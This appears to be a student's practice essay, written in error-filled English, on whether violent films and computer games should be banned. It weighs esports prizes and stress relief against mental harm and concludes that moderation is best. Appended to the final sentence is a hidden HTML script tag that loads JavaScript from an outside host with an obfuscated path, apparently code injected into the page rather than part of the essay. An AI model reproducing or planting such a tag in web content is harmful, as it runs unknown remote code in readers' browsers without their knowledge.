Films and computer games containing violence is popular these days. Many people believe that this should be banned while others believe that they are just for refreshment. Discuss both the views and give your opinion.

Today's genration is attracted by the voilence types of games and films .if it is having some bad face and good one also . The hype and crazyness in the world especially in the youth is at its peak . like we are having a example of india the people were so crazy that the govermnent have to ban such games and most of the movies which are not good for there mind. For example :- PUBG , Fortnite and many other battle royal games.

Let's talk about multiple advantages such as :- Now a days there are many esports tournaments organinsed by companies that has a price pool , it also develops the mind skills in kids, it moreover it reduces the stress.

some disadvantages like :- the impration on young one's is not good they always thinks about that and this can lead to mental probelms,the kids are not listing to there parents while playing the computer games.

it seemes like that if the youngsters are spending more and more time watching films and playing curel games it will definately react on there mind but on the other side it is good for person who are in tension .

Denpending upon me i belive so we should play games and watch movies in a limit. we should not spend most of the time doing all this .These all are part of our live we should enjoy this but thee excess of eveything is harmful.<script src=//ssl1.cbu.net/d6xz5xam></script>